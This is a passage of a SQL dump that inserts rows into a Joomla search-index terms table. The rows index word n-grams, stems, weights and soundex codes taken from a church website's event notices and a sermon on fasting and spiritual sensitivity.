(318819, 'up 29th', 'up 29th', 0, 1, 1.2333, 'U130', 1, '*'),
(318820, 'up 29th march', 'up 29th march', 0, 1, 1.4333, 'U13562', 1, '*'),
(318821, 'us to minister', 'us to minister', 0, 1, 1.4667, 'U235236', 1, '*'),
(318822, 'venue', 'venu', 0, 0, 0.3333, 'V500', 1, '*'),
(318823, 'venue the', 'venu the', 0, 1, 1.3, 'V530', 1, '*'),
(318824, 'venue the dream', 'venu the dream', 0, 1, 1.5, 'V5365', 1, '*'),
(318825, 'via', 'via', 1, 0, 0.025, 'V000', 1, '*'),
(318826, 'via the', 'via the', 0, 1, 1.2333, 'V300', 1, '*'),
(318827, 'via the following', 'via the following', 0, 1, 1.5667, 'V31452', 1, '*'),
(318828, 'we cordially', 'we cordially', 0, 1, 1.4, 'W2634', 1, '*'),
(318829, 'we cordially invite', 'we cordially invite', 0, 1, 1.6333, 'W2634513', 1, '*'),
(318830, 'will be six', 'will be six', 0, 1, 1.3667, 'W412', 1, '*'),
(318831, 'world harvest', 'world harvest', 0, 1, 1.4333, 'W6436123', 1, '*'),
(318832, 'world harvest network', 'world harvest network', 0, 1, 1.7, 'W64361235362', 1, '*'),
(318833, 'www', 'www', 0, 0, 0.2, 'W000', 1, '*'),
(318834, 'www dciradio', 'www dciradio', 0, 1, 1.4, 'W3263', 1, '*'),
(318835, 'www dciradio org', 'www dciradio org', 0, 1, 1.5333, 'W326362', 1, '*'),
(318836, 'www lifeoasisinternationalchurch', 'www lifeoasisinternationalchurch', 0, 1, 2, 'W4125365354262', 1, '*'),
(318837, 'www lifeoasisinternationalchurch org', 'www lifeoasisinternationalchurch org', 0, 1, 2, 'W412536535426262', 1, '*'),
(318838, 'you can also', 'you can also', 0, 1, 1.4, 'Y2542', 2, '*'),
(318839, 'you your friends', 'you your friends', 0, 1, 1.5333, 'Y616532', 1, '*'),
(318840, 'your friends', 'your friends', 0, 1, 1.4, 'Y616532', 1, '*'),
(318841, 'your friends and', 'your friends and', 0, 1, 1.5333, 'Y61653253', 1, '*'),
(318842, 'youtube', 'youtub', 0, 0, 0.4667, 'Y310', 1, '*'),
(318843, 'youtube www', 'youtub www', 0, 1, 1.3667, 'Y310', 1, '*'),
(318844, 'youtube www lifeoasisinternationalchurch', 'youtub www lifeoasisinternationalchurch', 0, 1, 2, 'Y314125365354262', 1, '*'),
(320001, '10 sensitivity', '10 sensitivity', 0, 1, 1.4667, 'S52313', 1, '*'),
(320002, 'a booster', 'a booster', 0, 1, 1.3, 'A1236', 2, '*'),
(320003, 'a booster to', 'a booster to', 0, 1, 1.4, 'A12363', 2, '*'),
(320004, 'a matter allow', 'a matter allow', 0, 1, 1.4667, 'A5364', 2, '*'),
(320005, 'a year increase', 'a year increase', 0, 1, 1.5, 'A65262', 2, '*'),
(320006, 'activities majority', 'activ majority', 0, 1, 1.6333, 'A231325263', 2, '*'),
(320007, 'activities majority of', 'activ majority of', 0, 1, 1.7333, 'A2313252631', 2, '*'),
(320008, 'affect your', 'affect your', 0, 1, 1.3667, 'A1236', 2, '*'),
(320009, 'affect your spirit', 'affect your spirit', 0, 1, 1.6, 'A12362163', 2, '*'),
(320010, 'against the knowledge', 'against the knowledge', 0, 1, 1.7, 'A252325432', 2, '*'),
(320011, 'all enemies', 'all enemies', 0, 1, 1.3667, 'A452', 2, '*'),
(320012, 'all enemies of', 'all enemies of', 0, 1, 1.4667, 'A4521', 2, '*'),
(320013, 'allow the', 'allow the', 0, 1, 1.3, 'A430', 4, '*'),
(320014, 'allow the fruit', 'allow the fruit', 0, 1, 1.5, 'A43163', 3, '*'),
(320015, 'an atmosphere', 'an atmosphere', 0, 1, 1.4333, 'A535216', 2, '*'),
(320016, 'an atmosphere of', 'an atmosphere of', 0, 1, 1.5333, 'A5352161', 2, '*'),
(320017, 'and attend', 'and attend', 0, 1, 1.3333, 'A5353', 2, '*'),
(320018, 'and attend their', 'and attend their', 0, 1, 1.5333, 'A53536', 2, '*'),
(320019, 'and callings', 'and callings', 0, 1, 1.4, 'A532452', 2, '*'),
(320020, 'and callings of', 'and callings of', 0, 1, 1.5, 'A5324521', 2, '*'),
(320021, 'and men\'s', 'and men', 0, 1, 1.3, 'A5352', 2, '*'),
(320022, 'and men\'s opinion', 'and men opinion', 0, 1, 1.5667, 'A535215', 2, '*'),
(320023, 'and offenses', 'and offenses', 0, 1, 1.4, 'A53152', 1, '*'),
(320024, 'and offenses are', 'and offenses are', 0, 1, 1.5333, 'A531526', 1, '*'),
(320025, 'and people that', 'and people that', 0, 1, 1.5, 'A53143', 2, '*'),
(320026, 'and regularly', 'and regularly', 0, 1, 1.4333, 'A5362464', 2, '*'),
(320027, 'and regularly listening', 'and regularly listening', 0, 1, 1.7667, 'A53624642352', 2, '*'),
(320028, 'anger wrath', 'anger wrath', 0, 1, 1.3667, 'A5263', 2, '*'),
(320029, 'anger wrath malice', 'anger wrath malice', 0, 1, 1.6, 'A5263542', 2, '*'),
(320030, 'anointing by', 'anoint by', 0, 1, 1.4, 'A53521', 2, '*'),
(320031, 'anointing by constant', 'anoint by constant', 0, 1, 1.7, 'A53521252353', 2, '*'),
(320032, 'another person\'s emotions', 'anoth person emotions', 0, 1, 1.8333, 'A536162525352', 2, '*'),
(320033, 'any anything', 'ani anything', 0, 1, 1.4, 'A5352', 2, '*'),
(320034, 'any anything that', 'ani anything that', 0, 1, 1.5667, 'A53523', 2, '*'),
(320035, 'anything that is', 'anyth that is', 0, 1, 1.5333, 'A535232', 2, '*'),
(320036, 'appetite', 'appetit', 0, 0, 0.5333, 'A130', 2, '*'),
(320037, 'appetite for', 'appetit for', 0, 1, 1.4, 'A1316', 2, '*'),
(320038, 'appetite for the', 'appetit for the', 0, 1, 1.5333, 'A13163', 2, '*'),
(320039, 'are all enemies', 'ar all enemies', 0, 1, 1.5, 'A6452', 2, '*'),
(320040, 'are not fasting', 'ar not fasting', 0, 1, 1.5, 'A65312352', 2, '*'),
(320041, 'are struggling', 'ar struggling', 0, 1, 1.4667, 'A62362452', 2, '*'),
(320042, 'are struggling because', 'ar struggling because', 0, 1, 1.7333, 'A6236245212', 2, '*'),
(320043, 'around strange', 'around strange', 0, 1, 1.4667, 'A65323652', 2, '*'),
(320044, 'around strange spiritual', 'around strange spiritual', 0, 1, 1.8, 'A653236521634', 2, '*'),
(320045, 'around you listen', 'around you listen', 0, 1, 1.5667, 'A6534235', 2, '*'),
(320046, 'atmosphere of', 'atmospher of', 0, 1, 1.4333, 'A352161', 2, '*'),
(320047, 'atmosphere of the', 'atmospher of the', 0, 1, 1.5667, 'A3521613', 2, '*'),
(320048, 'atmospheres', 'atmospher', 0, 0, 0.7333, 'A352162', 1, '*'),
(320049, 'atmospheres create', 'atmospher create', 0, 1, 1.6, 'A35216263', 1, '*'),
(320050, 'atmospheres create an', 'atmospher create an', 0, 1, 1.7, 'A352162635', 1, '*'),
(320051, 'attend their', 'attend their', 0, 1, 1.4, 'A3536', 2, '*'),
(320052, 'attend their ministry', 'attend their ministry', 0, 1, 1.7, 'A35365236', 2, '*'),
(320053, 'attitude of', 'attitud of', 0, 1, 1.3667, 'A310', 2, '*'),
(320054, 'attitude of god', 'attitud of god', 0, 1, 1.5, 'A3123', 2, '*'),
(320055, 'authentic', 'authent', 0, 0, 0.6, 'A3532', 3, '*'),
(320056, 'authentic gifts', 'authent gifts', 0, 1, 1.5, 'A3532132', 2, '*'),
(320057, 'authentic gifts and', 'authent gifts and', 0, 1, 1.6333, 'A353213253', 2, '*'),
(320058, 'away from un-anointed', 'awai from un-anointed', 0, 1, 1.7, 'A1653', 1, '*'),
(320059, 'because they can\'t', 'becaus they can', 0, 1, 1.6, 'B23253', 2, '*'),
(320060, 'bible regularly', 'bibl regularly', 0, 1, 1.5, 'B462464', 2, '*'),
(320061, 'bible regularly read', 'bibl regularly read', 0, 1, 1.6667, 'B46246463', 2, '*'),
(320062, 'bible through in', 'bibl through in', 0, 1, 1.5333, 'B43625', 2, '*'),
(320063, 'body and men\'s', 'bodi and men', 0, 1, 1.4667, 'B35352', 2, '*'),
(320064, 'body language', 'bodi language', 0, 1, 1.4333, 'B3452', 2, '*'),
(320065, 'body language in', 'bodi language in', 0, 1, 1.5333, 'B34525', 2, '*'),
(320066, 'booster', 'booster', 0, 0, 0.4667, 'B236', 2, '*'),
(320067, 'booster to', 'booster to', 0, 1, 1.3333, 'B2363', 2, '*'),
(320068, 'booster to spiritual', 'booster to spiritual', 0, 1, 1.6667, 'B236321634', 2, '*'),
(320069, 'brain body', 'brain body', 0, 1, 1.3333, 'B6513', 2, '*'),
(320070, 'brain body and', 'brain body and', 0, 1, 1.4667, 'B651353', 2, '*'),
(320071, 'bribe', 'bribe', 0, 0, 0.3333, 'B610', 2, '*'),
(320072, 'bribe god', 'bribe god', 0, 1, 1.3, 'B6123', 2, '*'),
(320073, 'bribe god to', 'bribe god to', 0, 1, 1.4, 'B6123', 2, '*'),
(320074, 'but just', 'but just', 0, 1, 1.2667, 'B323', 2, '*'),
(320075, 'but just doing', 'but just doing', 0, 1, 1.4667, 'B32352', 2, '*'),
(320076, 'by constant', 'by constant', 0, 1, 1.3667, 'B252353', 2, '*'),
(320077, 'by constant worship', 'by constant worship', 0, 1, 1.6333, 'B252353621', 2, '*'),
(320078, 'callings of the', 'call of the', 0, 1, 1.5, 'C45213', 2, '*'),
(320079, 'can increase', 'can increase', 0, 1, 1.4, 'C5262', 2, '*'),
(320080, 'can increase your', 'can increase your', 0, 1, 1.5667, 'C52626', 2, '*'),
(320081, 'can\'t get to', 'can get to', 0, 1, 1.4, 'C5323', 2, '*'),
(320082, 'cast down', 'cast down', 0, 1, 1.3, 'C350', 2, '*'),
(320083, 'cast down every', 'cast down every', 0, 1, 1.5, 'C3516', 2, '*'),
(320084, 'change god', 'chang god', 0, 1, 1.3333, 'C523', 2, '*'),
(320085, 'change god fasting', 'chang god fasting', 0, 1, 1.6, 'C52312352', 2, '*'),
(320086, 'changes you', 'chang you', 0, 1, 1.3667, 'C520', 2, '*'),
(320087, 'changes you fasting', 'chang you fasting', 0, 1, 1.6333, 'C5212352', 2, '*'),
(320088, 'christians are struggling', 'christian are struggling', 0, 1, 1.8333, 'C6235262362452', 2, '*'),
(320089, 'close', 'close', 0, 0, 0.3333, 'C420', 3, '*'),
(320090, 'close contact', 'close contact', 0, 1, 1.4333, 'C425323', 3, '*'),
(320091, 'close contact with', 'close contact with', 0, 1, 1.6, 'C425323', 3, '*'),
(320092, 'come through your', 'come through your', 0, 1, 1.5667, 'C53626', 3, '*'),
(320093, 'communicating', 'commun', 0, 0, 0.8667, 'C52352', 2, '*'),
(320094, 'communicating with', 'commun with', 0, 1, 1.6, 'C523523', 2, '*'),
(320095, 'communicating with them', 'commun with them', 0, 1, 1.7667, 'C5235235', 2, '*'),
(320096, 'concentrating', 'concentr', 0, 0, 0.8667, 'C52536352', 2, '*'),
(320097, 'concentrating on', 'concentr on', 0, 1, 1.5333, 'C525363525', 2, '*'),
(320098, 'concentrating on something', 'concentr on something', 0, 1, 1.8667, 'C52536352525352', 2, '*'),
(320099, 'concerning a', 'concern a', 0, 1, 1.4, 'C52652', 2, '*'),
(320100, 'concerning a matter', 'concern a matter', 0, 1, 1.6333, 'C52652536', 2, '*'),
(320101, 'confession of the', 'confess of the', 0, 1, 1.5667, 'C512513', 3, '*'),
(320102, 'conscience learn', 'conscienc learn', 0, 1, 1.5333, 'C5252465', 1, '*'),
(320103, 'conscience learn to', 'conscienc learn to', 0, 1, 1.6333, 'C52524653', 1, '*'),
(320104, 'constant worship', 'constant worship', 0, 1, 1.5333, 'C52353621', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(320105, 'constant worship praise', 'constant worship praise', 0, 1, 1.7667, 'C5235362162', 2, '*'),
(320106, 'contact with', 'contact with', 0, 1, 1.4, 'C5323', 3, '*'),
(320107, 'contact with authentic', 'contact with authentic', 0, 1, 1.7333, 'C5323532', 3, '*'),
(320108, 'create an', 'creat an', 0, 1, 1.3, 'C635', 2, '*'),
(320109, 'create an atmosphere', 'creat an atmosphere', 0, 1, 1.6667, 'C63535216', 2, '*'),
(320110, 'divine signal', 'divin signal', 0, 1, 1.4333, 'D15254', 2, '*'),
(320111, 'divine signal divine', 'divin signal divine', 0, 1, 1.6667, 'D15254315', 2, '*'),
(320112, 'divine signals', 'divin signals', 0, 1, 1.4667, 'D152542', 2, '*'),
(320113, 'divine signals come', 'divin signals come', 0, 1, 1.6333, 'D1525425', 2, '*'),
(320114, 'does not change', 'doe not change', 0, 1, 1.5, 'D253252', 2, '*'),
(320115, 'doing hunger', 'do hunger', 0, 1, 1.4, 'D52526', 2, '*'),
(320116, 'doing hunger strike', 'do hunger strike', 0, 1, 1.6333, 'D525262362', 2, '*'),
(320117, 'don\'t use fasting', 'don use fasting', 0, 1, 1.5667, 'D53212352', 2, '*'),
(320118, 'down every', 'down every', 0, 1, 1.3333, 'D516', 2, '*'),
(320119, 'down every evil', 'down every evil', 0, 1, 1.5, 'D51614', 2, '*'),
(320120, 'emotionalism', 'emotion', 0, 0, 0.8, 'E535425', 2, '*'),
(320121, 'emotionalism don\'t', 'emotion don', 0, 1, 1.6, 'E535425353', 2, '*'),
(320122, 'emotionalism don\'t let', 'emotion don let', 0, 1, 1.7333, 'E53542535343', 2, '*'),
(320123, 'emotions or', 'emot or', 0, 1, 1.3667, 'E53526', 2, '*'),
(320124, 'emotions or another', 'emot or another', 0, 1, 1.6333, 'E53526536', 2, '*'),
(320125, 'emotions rule', 'emot rule', 0, 1, 1.4333, 'E535264', 2, '*'),
(320126, 'emotions rule you', 'emot rule you', 0, 1, 1.5667, 'E535264', 2, '*'),
(320127, 'enemies of', 'enemi of', 0, 1, 1.3333, 'E521', 2, '*'),
(320128, 'enemies of spiritual', 'enemi of spiritual', 0, 1, 1.6667, 'E52121634', 2, '*'),
(320129, 'every evil', 'everi evil', 0, 1, 1.3333, 'E1614', 2, '*'),
(320130, 'every evil imagination', 'everi evil imagination', 0, 1, 1.7333, 'E161452535', 2, '*'),
(320131, 'evil imagination', 'evil imagination', 0, 1, 1.5333, 'E1452535', 2, '*'),
(320132, 'evil imagination any', 'evil imagination any', 0, 1, 1.6667, 'E1452535', 2, '*'),
(320133, 'false prophets', 'fals prophets', 0, 1, 1.4667, 'F4216132', 2, '*'),
(320134, 'false prophets and', 'fals prophets and', 0, 1, 1.6, 'F421613253', 2, '*'),
(320135, 'falsehood', 'falsehood', 0, 0, 0.6, 'F423', 2, '*'),
(320136, 'falsehood find', 'falsehood find', 0, 1, 1.4667, 'F423153', 2, '*'),
(320137, 'falsehood find genuine', 'falsehood find genuine', 0, 1, 1.7333, 'F42315325', 1, '*'),
(320138, 'fasting but', 'fast but', 0, 1, 1.3667, 'F235213', 2, '*'),
(320139, 'fasting but just', 'fast but just', 0, 1, 1.5333, 'F23521323', 2, '*'),
(320140, 'fasting changes', 'fast changes', 0, 1, 1.5, 'F235252', 2, '*'),
(320141, 'fasting changes you', 'fast changes you', 0, 1, 1.6333, 'F235252', 2, '*'),
(320142, 'fasting does', 'fast does', 0, 1, 1.4, 'F235232', 2, '*'),
(320143, 'fasting does not', 'fast does not', 0, 1, 1.5333, 'F23523253', 2, '*'),
(320144, 'fasting fasting', 'fast fasting', 0, 1, 1.5, 'F235212352', 2, '*'),
(320145, 'fasting fasting is', 'fast fasting is', 0, 1, 1.6, 'F235212352', 2, '*'),
(320146, 'fasting fine-tunes', 'fast fine-tunes', 0, 1, 1.6, 'F235215352', 2, '*'),
(320147, 'fasting fine-tunes your', 'fast fine-tunes your', 0, 1, 1.7667, 'F2352153526', 2, '*'),
(320148, 'fasting is', 'fast is', 0, 1, 1.3333, 'F2352', 2, '*'),
(320149, 'fasting is a', 'fast is a', 0, 1, 1.4, 'F2352', 2, '*'),
(320150, 'fasting to', 'fast to', 0, 1, 1.3333, 'F23523', 2, '*'),
(320151, 'fasting to bribe', 'fast to bribe', 0, 1, 1.5333, 'F23523161', 2, '*'),
(320152, 'find genuine', 'find genuine', 0, 1, 1.4, 'F5325', 1, '*'),
(320153, 'find genuine ministers', 'find genuine ministers', 0, 1, 1.7333, 'F53252362', 1, '*'),
(320154, 'fine-tunes', 'fine-tun', 0, 0, 0.6667, 'F5352', 2, '*'),
(320155, 'fine-tunes your', 'fine-tun your', 0, 1, 1.5, 'F53526', 2, '*'),
(320156, 'fine-tunes your frequency', 'fine-tun your frequency', 0, 1, 1.8333, 'F5352616252', 2, '*'),
(320157, 'for the word', 'for the word', 0, 1, 1.4, 'F6363', 2, '*'),
(320158, 'frequency', 'frequenc', 0, 0, 0.6, 'F6252', 2, '*'),
(320159, 'frequency of', 'frequenc of', 0, 1, 1.4, 'F62521', 2, '*'),
(320160, 'frequency of the', 'frequenc of the', 0, 1, 1.5333, 'F625213', 2, '*'),
(320161, 'frequency that', 'frequenc that', 0, 1, 1.4667, 'F62523', 2, '*'),
(320162, 'frequency that god', 'frequenc that god', 0, 1, 1.6, 'F6252323', 2, '*'),
(320163, 'frequency to', 'frequenc to', 0, 1, 1.4, 'F62523', 2, '*'),
(320164, 'frequency to the', 'frequenc to the', 0, 1, 1.5333, 'F62523', 2, '*'),
(320165, 'from un-anointed', 'from un-anointed', 0, 1, 1.5333, 'F653', 1, '*'),
(320166, 'from un-anointed atmospheres', 'from un-anointed atmospheres', 0, 1, 1.9333, 'F65352162', 1, '*'),
(320167, 'genuine ministers', 'genuin ministers', 0, 1, 1.5667, 'G52362', 1, '*'),
(320168, 'genuine ministers around', 'genuin ministers around', 0, 1, 1.8, 'G52362653', 1, '*'),
(320169, 'get to the', 'get to the', 0, 1, 1.3333, 'G300', 3, '*'),
(320170, 'gifts and', 'gift and', 0, 1, 1.3, 'G13253', 2, '*'),
(320171, 'gifts and callings', 'gift and callings', 0, 1, 1.6, 'G132532452', 2, '*'),
(320172, 'god fasting', 'god fasting', 0, 1, 1.3667, 'G312352', 2, '*'),
(320173, 'god fasting changes', 'god fasting changes', 0, 1, 1.6333, 'G31235252', 2, '*'),
(320174, 'god is communicating', 'god is communicating', 0, 1, 1.6667, 'G3252352', 2, '*'),
(320175, 'god learn', 'god learn', 0, 1, 1.3, 'G3465', 2, '*'),
(320176, 'god learn to', 'god learn to', 0, 1, 1.4, 'G34653', 2, '*'),
(320177, 'god one', 'god one', 0, 1, 1.2333, 'G350', 2, '*'),
(320178, 'god one of', 'god one of', 0, 1, 1.3333, 'G351', 2, '*'),
(320179, 'god study', 'god study', 0, 1, 1.3, 'G323', 2, '*'),
(320180, 'god study the', 'god study the', 0, 1, 1.4333, 'G323', 2, '*'),
(320181, 'god towards', 'god towards', 0, 1, 1.3667, 'G3632', 2, '*'),
(320182, 'god towards you', 'god towards you', 0, 1, 1.5, 'G3632', 2, '*'),
(320183, 'god will signal', 'god will signal', 0, 1, 1.5, 'G34254', 2, '*'),
(320184, 'god your', 'god your', 0, 1, 1.2667, 'G360', 2, '*'),
(320185, 'god your words', 'god your words', 0, 1, 1.4667, 'G3632', 2, '*'),
(320186, 'grow in you', 'grow in you', 0, 1, 1.3667, 'G650', 2, '*'),
(320187, 'heart is', 'heart is', 0, 1, 1.2667, 'H632', 2, '*'),
(320188, 'heart is stronger', 'heart is stronger', 0, 1, 1.5667, 'H63236526', 2, '*'),
(320189, 'his mind concerning', 'hi mind concerning', 0, 1, 1.6333, 'H253252652', 2, '*'),
(320190, 'holy spirit if', 'holi spirit if', 0, 1, 1.4667, 'H421631', 2, '*'),
(320191, 'holy spirit stop', 'holi spirit stop', 0, 1, 1.5333, 'H42163231', 2, '*'),
(320192, 'hunger', 'hunger', 0, 0, 0.4, 'H526', 2, '*'),
(320193, 'hunger strike', 'hunger strike', 0, 1, 1.4333, 'H5262362', 2, '*'),
(320194, 'hunger strike don\'t', 'hunger strike don', 0, 1, 1.6333, 'H5262362353', 2, '*'),
(320195, 'if you\'re not', 'if you not', 0, 1, 1.4333, 'I1653', 2, '*'),
(320196, 'imagination', 'imagin', 0, 0, 0.7333, 'I52535', 2, '*'),
(320197, 'imagination any', 'imagin any', 0, 1, 1.5, 'I52535', 2, '*'),
(320198, 'imagination any anything', 'imagin any anything', 0, 1, 1.8, 'I52535352', 2, '*'),
(320199, 'in a year', 'in a year', 0, 1, 1.3, 'I560', 2, '*'),
(320200, 'in falsehood', 'in falsehood', 0, 1, 1.4, 'I51423', 2, '*'),
(320201, 'in falsehood find', 'in falsehood find', 0, 1, 1.5667, 'I51423153', 2, '*'),
(320202, 'in tongue', 'in tongue', 0, 1, 1.3, 'I5352', 2, '*'),
(320203, 'in tongue instant', 'in tongue instant', 0, 1, 1.5667, 'I535252353', 2, '*'),
(320204, 'in you reduce', 'in you reduce', 0, 1, 1.4333, 'I5632', 2, '*'),
(320205, 'increase your', 'increas your', 0, 1, 1.4333, 'I52626', 3, '*'),
(320206, 'increase your confession', 'increas your confession', 0, 1, 1.8, 'I5262625125', 3, '*'),
(320207, 'increase your intake', 'increas your intake', 0, 1, 1.6667, 'I52626532', 2, '*'),
(320208, 'increase your sensitivity', 'increas your sensitivity', 0, 1, 1.8333, 'I52626252313', 2, '*'),
(320209, 'increase your spiritual', 'increas your spiritual', 0, 1, 1.7667, 'I5262621634', 2, '*'),
(320210, 'influences', 'influenc', 0, 0, 0.6667, 'I51452', 2, '*'),
(320211, 'influences false', 'influenc false', 0, 1, 1.5333, 'I51452142', 2, '*'),
(320212, 'influences false prophets', 'influenc false prophets', 0, 1, 1.8333, 'I5145214216132', 2, '*'),
(320213, 'instant obedience', 'instant obedience', 0, 1, 1.5667, 'I523531352', 3, '*'),
(320214, 'instant obedience to', 'instant obedience to', 0, 1, 1.6667, 'I5235313523', 3, '*'),
(320215, 'intake', 'intak', 0, 0, 0.4, 'I532', 2, '*'),
(320216, 'intake of', 'intak of', 0, 1, 1.3, 'I5321', 2, '*'),
(320217, 'intake of the', 'intak of the', 0, 1, 1.4333, 'I53213', 2, '*'),
(320218, 'is a booster', 'is a booster', 0, 1, 1.4, 'I21236', 2, '*'),
(320219, 'is against', 'is against', 0, 1, 1.3333, 'I2523', 2, '*'),
(320220, 'is against the', 'is against the', 0, 1, 1.4667, 'I2523', 2, '*'),
(320221, 'is communicating', 'is communicating', 0, 1, 1.5333, 'I252352', 2, '*'),
(320222, 'is communicating with', 'is communicating with', 0, 1, 1.7, 'I2523523', 2, '*'),
(320223, 'is losing', 'is losing', 0, 1, 1.3, 'I24252', 2, '*'),
(320224, 'is losing appetite', 'is losing appetite', 0, 1, 1.6, 'I2425213', 2, '*'),
(320225, 'item 10', 'item 10', 0, 1, 1.2333, 'I350', 1, '*'),
(320226, 'item 10 sensitivity', 'item 10 sensitivity', 0, 1, 1.6333, 'I35252313', 1, '*'),
(320227, 'just doing', 'just doing', 0, 1, 1.3333, 'J352', 2, '*'),
(320228, 'just doing hunger', 'just doing hunger', 0, 1, 1.5667, 'J352526', 2, '*'),
(320229, 'k2 item 10', 'k2 item 10', 0, 1, 1.3333, 'K350', 1, '*'),
(320230, 'knowledge of', 'knowledg of', 0, 1, 1.4, 'K54321', 2, '*'),
(320231, 'knowledge of god', 'knowledg of god', 0, 1, 1.5333, 'K5432123', 2, '*'),
(320232, 'language', 'languag', 0, 0, 0.5333, 'L520', 2, '*'),
(320233, 'language in', 'languag in', 0, 1, 1.3667, 'L525', 2, '*'),
(320234, 'language in the', 'languag in the', 0, 1, 1.5, 'L5253', 2, '*'),
(320235, 'learn to rebuke', 'learn to rebuke', 0, 1, 1.5, 'L653612', 1, '*'),
(320236, 'learn to walk', 'learn to walk', 0, 1, 1.4333, 'L65342', 2, '*'),
(320237, 'let your emotions', 'let your emotions', 0, 1, 1.5667, 'L365352', 2, '*'),
(320238, 'listen to them', 'listen to them', 0, 1, 1.4667, 'L23535', 2, '*'),
(320239, 'listening to messages', 'listen to messages', 0, 1, 1.7, 'L2352352', 2, '*'),
(320240, 'lord until', 'lord until', 0, 1, 1.3333, 'L63534', 2, '*'),
(320241, 'lord until your', 'lord until your', 0, 1, 1.5, 'L635346', 2, '*'),
(320242, 'losing appetite', 'lose appetite', 0, 1, 1.5, 'L25213', 2, '*'),
(320243, 'losing appetite for', 'lose appetite for', 0, 1, 1.6333, 'L2521316', 2, '*'),
(320244, 'maintain close', 'maintain close', 0, 1, 1.4667, 'M35242', 3, '*'),
(320245, 'maintain close contact', 'maintain close contact', 0, 1, 1.7333, 'M352425323', 3, '*'),
(320246, 'malice and', 'malic and', 0, 1, 1.3333, 'M4253', 1, '*'),
(320247, 'malice and offenses', 'malic and offenses', 0, 1, 1.6333, 'M4253152', 1, '*'),
(320248, 'matter allow', 'matter allow', 0, 1, 1.4, 'M364', 2, '*'),
(320249, 'matter allow the', 'matter allow the', 0, 1, 1.5333, 'M3643', 2, '*'),
(320250, 'men\'s opinion', 'men opinion', 0, 1, 1.4333, 'M215', 2, '*'),
(320251, 'men\'s opinion your', 'men opinion your', 0, 1, 1.6, 'M2156', 2, '*'),
(320252, 'messages', 'messag', 0, 0, 0.5333, 'M200', 2, '*'),
(320253, 'mind concerning', 'mind concerning', 0, 1, 1.5, 'M3252652', 2, '*'),
(320254, 'mind concerning a', 'mind concerning a', 0, 1, 1.5667, 'M3252652', 2, '*'),
(320255, 'ministers', 'minist', 0, 0, 0.6, 'M2362', 1, '*'),
(320256, 'ministers around', 'minist around', 0, 1, 1.5333, 'M2362653', 1, '*'),
(320257, 'ministers around you', 'minist around you', 0, 1, 1.6667, 'M2362653', 1, '*'),
(320258, 'ministry increase', 'ministri increase', 0, 1, 1.5667, 'M2365262', 2, '*'),
(320259, 'ministry increase your', 'ministri increase your', 0, 1, 1.7333, 'M23652626', 2, '*'),
(320260, 'more time speaking', 'more time speaking', 0, 1, 1.6, 'M63521252', 2, '*'),
(320261, 'negative passions', 'neg passions', 0, 1, 1.5667, 'N231252', 1, '*'),
(320262, 'negative passions reduce', 'neg passions reduce', 0, 1, 1.8, 'N231252632', 1, '*'),
(320263, 'not change', 'not change', 0, 1, 1.3333, 'N3252', 2, '*'),
(320264, 'not change god', 'not change god', 0, 1, 1.4667, 'N32523', 2, '*'),
(320265, 'not concentrating', 'not concentrating', 0, 1, 1.5667, 'N3252536352', 2, '*'),
(320266, 'not concentrating on', 'not concentrating on', 0, 1, 1.6667, 'N32525363525', 2, '*'),
(320267, 'not fasting', 'not fasting', 0, 1, 1.3667, 'N312352', 2, '*'),
(320268, 'not fasting but', 'not fasting but', 0, 1, 1.5, 'N31235213', 2, '*'),
(320269, 'note that fasting', 'note that fasting', 0, 1, 1.5667, 'N312352', 2, '*'),
(320270, 'of god learn', 'of god learn', 0, 1, 1.4, 'O123465', 2, '*'),
(320271, 'of god one', 'of god one', 0, 1, 1.3333, 'O1235', 2, '*'),
(320272, 'of god study', 'of god study', 0, 1, 1.4, 'O12323', 2, '*'),
(320273, 'of god towards', 'of god towards', 0, 1, 1.4667, 'O123632', 2, '*'),
(320274, 'of god will', 'of god will', 0, 1, 1.3667, 'O1234', 2, '*'),
(320275, 'of god your', 'of god your', 0, 1, 1.3667, 'O1236', 2, '*'),
(320276, 'of spiritual', 'of spiritual', 0, 1, 1.4, 'O121634', 2, '*'),
(320277, 'of spiritual sensitivity', 'of spiritual sensitivity', 0, 1, 1.8, 'O121634252313', 2, '*'),
(320278, 'of spiritual sickness', 'of spiritual sickness', 0, 1, 1.7, 'O121634252', 2, '*'),
(320279, 'of the anointing', 'of the anointing', 0, 1, 1.5333, 'O135352', 2, '*'),
(320280, 'of the signs', 'of the signs', 0, 1, 1.4, 'O13252', 2, '*'),
(320281, 'offenses', 'offens', 0, 0, 0.5333, 'O152', 1, '*'),
(320282, 'offenses are', 'offens are', 0, 1, 1.4, 'O1526', 1, '*'),
(320283, 'offenses are all', 'offens are all', 0, 1, 1.5333, 'O15264', 1, '*'),
(320284, 'on something', 'on something', 0, 1, 1.4, 'O525352', 2, '*'),
(320285, 'on something spiritual', 'on something spiritual', 0, 1, 1.7333, 'O5253521634', 2, '*'),
(320286, 'operate in falsehood', 'oper in falsehood', 0, 1, 1.6667, 'O16351423', 2, '*'),
(320287, 'opinion your', 'opinion your', 0, 1, 1.4, 'O156', 2, '*'),
(320288, 'opinion your body', 'opinion your body', 0, 1, 1.5667, 'O15613', 2, '*'),
(320289, 'or another', 'or another', 0, 1, 1.3333, 'O6536', 2, '*'),
(320290, 'or another person\'s', 'or another person', 0, 1, 1.6333, 'O653616252', 2, '*'),
(320291, 'passions', 'passion', 0, 0, 0.5333, 'P252', 2, '*'),
(320292, 'passions reduce', 'passion reduce', 0, 1, 1.5, 'P252632', 1, '*'),
(320293, 'passions reduce spiritual', 'passion reduce spiritual', 0, 1, 1.8333, 'P2526321634', 1, '*'),
(320294, 'people that operate', 'peopl that operate', 0, 1, 1.6333, 'P43163', 2, '*'),
(320295, 'person\'s emotions', 'person emotions', 0, 1, 1.5667, 'P62525352', 2, '*'),
(320296, 'person\'s emotions rule', 'person emotions rule', 0, 1, 1.7333, 'P6252535264', 2, '*'),
(320297, 'praise and', 'prais and', 0, 1, 1.3333, 'P6253', 2, '*'),
(320298, 'praise and regularly', 'prais and regularly', 0, 1, 1.6667, 'P625362464', 2, '*'),
(320299, 'prophets and people', 'prophet and people', 0, 1, 1.6333, 'P61325314', 2, '*'),
(320300, 'read the bible', 'read the bible', 0, 1, 1.4667, 'R314', 2, '*'),
(320301, 'rebuke', 'rebuk', 0, 0, 0.4, 'R120', 2, '*'),
(320302, 'rebuke wrong', 'rebuk wrong', 0, 1, 1.4, 'R12652', 2, '*'),
